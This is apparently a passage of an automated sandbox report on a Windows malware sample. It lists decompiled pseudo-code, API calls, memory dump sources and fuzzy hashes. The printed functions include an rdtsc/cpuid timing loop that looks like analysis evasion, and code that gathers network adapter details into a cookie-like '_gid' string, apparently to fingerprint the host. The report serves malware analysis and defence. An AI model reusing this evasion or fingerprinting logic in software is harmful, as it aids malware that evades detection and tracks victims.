                                                                                                                                                                                                    									HeapFree(??, ??, ??);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								E00461FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                                                                                                                                                                                                    								_t49 = _t51;
                                                                                                                                                                                                    								if(_t51 != 0) {
                                                                                                                                                                                                    									E00462A1C(_t49, _t73 + 0x1b, _t51);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                    • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction ID: ec861b19bd583ad65344df53b5df11799208e6208476078328c409b79f2cc9a5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0218C72300A40AAEF209FB2E5543DD23A1E789788F48442BAF4E67758FE3CD509C356
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                    • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                    • API String ID: 4275171209-1517691801
                                                                                                                                                                                                    • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                    • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                    • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                    • API String ID: 1174013218-1650116920
                                                                                                                                                                                                    • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                    • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 4275171209-2766056989
                                                                                                                                                                                                    • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                    • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcessSleepUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 354099737-0
                                                                                                                                                                                                    • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction ID: d89cefbe47e75c605efbb6f0079a1bc08ae79106d6b421b35fda30a90ec4728b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEC08C70105690C2FF1D5730E8487282234A382309F04061AC30305AF0EF3F44C8C30F
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                    • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                    • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,00461E13), ref: 0046264B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoNativeSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1721193555-0
                                                                                                                                                                                                    • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction ID: f7505df165ca0c88a4bea8b45b7e825aff0a7df183447f51ab4e5144ea974bc0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E09262728A41D2DF10EF20E8443993320FBC5708F8441268A4E02664FF2DCA5DC719
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                    • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction ID: c3066b6d6183c94523ceb9c6e34ae53bc4a150e32b7b0f06f289f8351ff0536c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5D0A7B2E1024083EB308710EA1679A2311F3D4315F844206C64A44964EF3DC158C609
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %
                                                                                                                                                                                                    • API String ID: 0-2567322570
                                                                                                                                                                                                    • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                    • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2103165841.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103160397.000007FEF8FB0000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103180838.000007FEF8FB5000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103208055.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.2103244764.000007FEF8FC0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                    • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E00461E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
                                                                                                                                                                                                    				signed int _t18;
                                                                                                                                                                                                    				signed long long _t31;
                                                                                                                                                                                                    				signed long long _t34;
                                                                                                                                                                                                    				signed long long _t41;
                                                                                                                                                                                                    				signed long long _t42;
                                                                                                                                                                                                    				signed long long _t43;
                                                                                                                                                                                                    				signed long long _t44;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				signed long long _t47;
                                                                                                                                                                                                    				long long _t49;
                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                    				void* _t52;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t47 = __rsi;
                                                                                                                                                                                                    				_t41 = __rdx;
                                                                                                                                                                                                    				_t31 = __rax;
                                                                                                                                                                                                    				 *((long long*)(_t51 + 8)) = __rbx;
                                                                                                                                                                                                    				 *((long long*)(_t51 + 0x10)) = _t49;
                                                                                                                                                                                                    				 *((long long*)(_t51 + 0x18)) = __rsi;
                                                                                                                                                                                                    				_push(_t45);
                                                                                                                                                                                                    				_t52 = _t51 - 0x30;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					SwitchToThread();
                                                                                                                                                                                                    					asm("rdtsc");
                                                                                                                                                                                                    					_t42 = _t41 << 0x20;
                                                                                                                                                                                                    					asm("cpuid");
                                                                                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x20)) = 1;
                                                                                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
                                                                                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x28)) = 0;
                                                                                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
                                                                                                                                                                                                    					asm("rdtsc");
                                                                                                                                                                                                    					_t43 = _t42 << 0x20;
                                                                                                                                                                                                    					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
                                                                                                                                                                                                    					_t45 = _t45 + _t34;
                                                                                                                                                                                                    					_t18 = SwitchToThread();
                                                                                                                                                                                                    					asm("rdtsc");
                                                                                                                                                                                                    					_t44 = _t43 << 0x20;
                                                                                                                                                                                                    					asm("rdtsc");
                                                                                                                                                                                                    					_t41 = _t44 << 0x20;
                                                                                                                                                                                                    					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
                                                                                                                                                                                                    					_t47 = _t47 + _t31;
                                                                                                                                                                                                    					_t49 = _t49 - 1;
                                                                                                                                                                                                    				} while (_t49 != 0);
                                                                                                                                                                                                    				return _t18 / _t47;
                                                                                                                                                                                                    			}
















                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                    • Instruction ID: e9a9cd00dc2c79723797bc32427b0991e0d3177a011f4b8fcac31760fea994d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F01D8B2B14B908BDF248F36B600349B6A2F38D7C0F148535EB9C43B18DA3CD4958B04
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                    			E020927BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                    				void* __rdi;
                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				long long _t46;
                                                                                                                                                                                                    				intOrPtr* _t48;
                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                    				intOrPtr* _t62;
                                                                                                                                                                                                    				signed long long _t64;
                                                                                                                                                                                                    				long long* _t67;
                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                    				struct HINSTANCE__* _t79;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                    				char* _t83;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t64 = __rsi;
                                                                                                                                                                                                    				_t46 = __rbx;
                                                                                                                                                                                                    				_t44 = _t69;
                                                                                                                                                                                                    				 *((long long*)(_t44 + 8)) = __rbx;
                                                                                                                                                                                                    				 *((long long*)(_t44 + 0x18)) = __rbp;
                                                                                                                                                                                                    				 *((long long*)(_t44 + 0x20)) = __rsi;
                                                                                                                                                                                                    				_push(_t62);
                                                                                                                                                                                                    				_t80 = __rcx;
                                                                                                                                                                                                    				_t83 = L"; _gid=";
                                                                                                                                                                                                    				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
                                                                                                                                                                                                    				LoadLibraryA(_t82);
                                                                                                                                                                                                    				GetProcAddress(_t79);
                                                                                                                                                                                                    				_t67 = _t44;
                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					r9d = 1;
                                                                                                                                                                                                    					_t23 = E02092990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x20970c4, _t77, _t78);
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					return _t23;
                                                                                                                                                                                                    				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E02092990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,02092CFE,?,?,00000003,020924A4), ref: 0209280F
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,02092CFE,?,?,00000003,020924A4), ref: 02092845
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersInfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177971545-0
                                                                                                                                                                                                    • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction ID: 08033dd42a9111836460565db6bd3abec0680d1c119b4740cf2fbacf3efed143
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04318476602740A9EF16DB51E44879A77A1FB89F94F484125CE0F07B56EF38C18AE340
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(?,?,00000000,02092CB1,?,?,00000003,020924A4), ref: 020916CB
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,02092CB1,?,?,00000003,020924A4), ref: 02091709
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3114120137-0
                                                                                                                                                                                                    • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction ID: 2c8173aa8c1be8cc6d4cad0c536e293bbc0337cd02452c8439880483ec519251
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2218E76715B4283EF468B56A848369E2B2FB89BC5F484034EE4F47756EF3DC486A700
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction ID: d6afad58def3869fbcadb301dd7987e7cdca2494630fa0ecdf5ee760bb327733
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9871BF32300B8287EF65CF66E8447A977A1FB88B98F448125DE4B53B65DF38C596DB00
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2111281002.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
• Associated: 00000004.00000002.2111271093.000007FEF8F90000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2111291794.000007FEF8F95000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2111308631.000007FEF8F9E000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2111312450.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                    • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                    • API String ID: 4275171209-1517691801
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2111281002.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111271093.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111291794.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111308631.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111312450.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                    • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                    • API String ID: 1174013218-1650116920
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2111281002.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111271093.000007FEF8F90000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111291794.000007FEF8F95000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111308631.000007FEF8F9E000.00000002.00020000.sdmp
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111312450.000007FEF8FA0000.00000002.00020000.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 4275171209-2766056989
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2107553885.0000000002090000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcessSleepUser
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 354099737-0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000004.00000002.2111281002.000007FEF8F91000.00000020.00020000.sdmp, Offset: 000007FEF8F90000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000004.00000002.2111271093.000007FEF8F90000.00000002.00020000.sdmp
